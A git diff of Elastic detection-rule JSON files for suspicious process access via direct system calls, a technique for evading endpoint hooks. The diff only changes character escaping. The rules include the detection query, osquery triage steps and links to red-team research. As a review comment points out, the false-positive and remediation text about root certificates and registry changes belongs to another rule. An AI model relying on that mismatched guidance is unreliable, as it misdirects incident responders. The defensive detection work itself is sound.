addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or 
created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -66,7 +66,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_106.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_106.json
index 8ecdb2de074..3a0bc621ae3 100644
--- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_106.json
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. 
It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or 
created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" 
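Review bot: The false-positive and remediation guidance in the re-serialized `"note"` line still belongs to a different rule: it says the detection fires on applications that install root certificates for SSL inspection, tells the analyst to remove a malicious certificate from the root certificate store, and ties the account review to "after the registry modification", none of which matches a Sysmon event 10 process-access detection keyed on `winlog.event_data.CallTrace`. The same text appears in the corresponding hunks of `2dd480be-1263-4d9c-8672-172928f6789a_107.json` and the truncated `_208.json` hunk below. I would replace the false-positive bullet with `- This detection may be triggered by legitimate software that accesses processes from memory regions outside ntdll, such as the security products, browser component, PDF reader and game client already excluded in the query; benign true positives (B-TPs) can be added as exceptions if necessary.`, drop the root-certificate remediation bullet, and change `after the registry modification` to `after the process access event`. These versioned JSON files look like generated snapshots, so the wording fix presumably belongs in the rule source that produces them rather than in the archived copies.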
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_107.json b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_107.json
index 431c0b3c25d..a216073adec 100644
--- a/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/2dd480be-1263-4d9c-8672-172928f6789a_107.json
@@ -12,8 +12,8 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Process Access via Direct System Call", - "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, 
start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", - "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) \u003e 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", + "note": "## Triage and analysis\n\n### Investigating Suspicious Process Access via Direct System Call\n\nEndpoint security solutions usually hook userland Windows APIs in order to decide if the code that is being executed is malicious or not. 
It's possible to bypass hooked functions by writing malicious functions that call syscalls directly.\n\nMore context and technical details can be found in this [research blog](https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/).\n\nThis rule identifies suspicious process access events from an unknown memory region. Attackers can use direct system calls to bypass security solutions that rely on hooks.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate any abnormal behavior by the subject process such as network connections, registry or file modifications, and any spawned child processes.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the process executable using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or 
created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n\n### False positive analysis\n\n- This detection may be triggered by certain applications that install root certificates for the purpose of inspecting SSL traffic. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove the malicious certificate from the root certificate store.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "query": "process where host.os.type == \"windows\" and event.code == \"10\" and\n length(winlog.event_data.CallTrace) > 0 and\n\n /* Sysmon CallTrace starting with unknown memory module instead of ntdll which host Windows NT Syscalls */\n not winlog.event_data.CallTrace :\n (\"?:\\\\WINDOWS\\\\SYSTEM32\\\\ntdll.dll*\",\n \"?:\\\\WINDOWS\\\\SysWOW64\\\\ntdll.dll*\",\n \"?:\\\\Windows\\\\System32\\\\wow64cpu.dll*\",\n \"?:\\\\WINDOWS\\\\System32\\\\wow64win.dll*\",\n \"?:\\\\Windows\\\\System32\\\\win32u.dll*\") and\n\n not winlog.event_data.TargetImage :\n (\"?:\\\\Program Files (x86)\\\\Malwarebytes Anti-Exploit\\\\mbae-svc.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\*\\\\msedgewebview2.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\*\\\\AcroCEF.exe\") and\n\n not (process.executable : (\"?:\\\\Program Files\\\\Adobe\\\\Acrobat DC\\\\Acrobat\\\\Acrobat.exe\",\n \"?:\\\\Program Files (x86)\\\\World of Warcraft\\\\_classic_\\\\WowClassic.exe\") and\n not winlog.event_data.TargetImage : \"?:\\\\WINDOWS\\\\system32\\\\lsass.exe\")\n", "references": [ "https://twitter.com/SBousseaden/status/1278013896440324096", "https://www.ired.team/offensive-security/defense-evasion/using-syscalls-directly-from-visual-studio-to-bypass-avs-edrs" 
@@ -53,7 +53,7 @@
 ],
 "risk_score": 73,
 "rule_id": "2dd480be-1263-4d9c-8672-172928f6789a",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
